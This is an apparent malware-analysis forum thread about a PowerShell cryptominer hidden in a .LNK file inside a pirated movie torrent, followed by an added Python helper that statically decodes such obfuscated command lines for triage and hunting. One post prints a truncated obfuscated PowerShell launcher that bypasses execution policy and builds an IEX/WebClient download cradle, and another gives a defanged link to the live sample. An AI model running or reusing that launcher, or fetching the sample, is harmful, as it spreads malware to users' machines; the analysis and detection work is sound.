A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #32464  by Haruhi
 Wed Jan 16, 2019 8:29 pm
One torrent on ThePirateBay, of a new release, carries a ".LNK" file. This file contains a lot of information. It is a PowerShell virus capable of cryptocurrency mining.

Movie: The_girl_in_the_spider_web. Researcher: @0xffff0800

hxxps://mega.nz/#!N80XUCza!rgQMgunzj8qHHlVDCypxBXNrNYa_ZE8oDk3LatADBwg enjoy.

+2.000 seeders :|
 #32470  by hackr8
 Thu Jan 17, 2019 11:49 am
Raw code:
powershell.exe -NoPr -WINd 1 -eXEc ByP   iex ("$( SeT-ITeM  'VariaBle:OFS' '')"+[StRING][CHAr[]] (73 ,69, 88, 40, 78,101 , 119 , 45, 79 ,98,106,101 , 99,116,32 ,83,121,115 ,116 ,101 ,109, 46, 78 , 101,116,46,87 , 101

AV detection: https://www.virustotal.com/#/file/9e5a3 ... /detection
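Added example, not part of any post in this thread: a static triage helper in Python that decodes the `[char[]](...)` run and expands the abbreviated switches in the command line quoted above, without executing any of it. The function names are hypothetical, and the sample is the truncated text as it appears in the post, so the decoded string is partial.

```python
import re

# Sample copied from the post above; the char-code list is cut off on the
# page, so the recovered string is partial.
SAMPLE = (
    'powershell.exe -NoPr -WINd 1 -eXEc ByP   iex ("$( SeT-ITeM  \'VariaBle:OFS\' \'\')"+'
    "[StRING][CHAr[]] (73 ,69, 88, 40, 78,101 , 119 , 45, 79 ,98,106,101 , 99,116,32 ,"
    "83,121,115 ,116 ,101 ,109, 46, 78 , 101,116,46,87 , 101"
)

# [char[]] followed by "(" and a run of decimal codes. The closing ")" is
# not required, so truncated captures (logs, forum pastes) still decode.
CHAR_ARRAY = re.compile(
    r"\[\s*char\s*\[\s*\]\s*\]\s*\(\s*((?:\d{1,7}\s*,\s*)*\d{1,7})", re.I)

# powershell.exe parameters; PowerShell accepts any unambiguous prefix.
PARAMS = ("PSConsoleFile", "Version", "NoLogo", "NoExit", "Sta", "Mta",
          "NoProfile", "NonInteractive", "InputFormat", "OutputFormat",
          "WindowStyle", "EncodedCommand", "ConfigurationName", "File",
          "ExecutionPolicy", "Command")


def decode_char_arrays(cmdline):
    """Return the strings hidden in [char[]](n, n, ...) runs (no execution)."""
    decoded = []
    for match in CHAR_ARRAY.finditer(cmdline):
        codes = [int(n) for n in re.findall(r"\d+", match.group(1))]
        decoded.append("".join(chr(c) for c in codes if c < 0x110000))
    return decoded


def expand_params(cmdline):
    """Map abbreviated -switches to full parameter names; skip ambiguous ones."""
    expanded = []
    for token in re.findall(r"(?<!\S)-([A-Za-z]+)", cmdline):
        hits = [p for p in PARAMS if p.lower().startswith(token.lower())]
        if len(hits) == 1:
            expanded.append(hits[0])
    return expanded


if __name__ == "__main__":
    print("switches:", expand_params(SAMPLE))
    for text in decode_char_arrays(SAMPLE):
        print("decoded :", text)
```

The same two checks work as a hunting heuristic over process-creation logs: a command line that combines shortened `NoProfile`/`WindowStyle`/`ExecutionPolicy` switches with a `[char[]]` numeric run is worth a closer look.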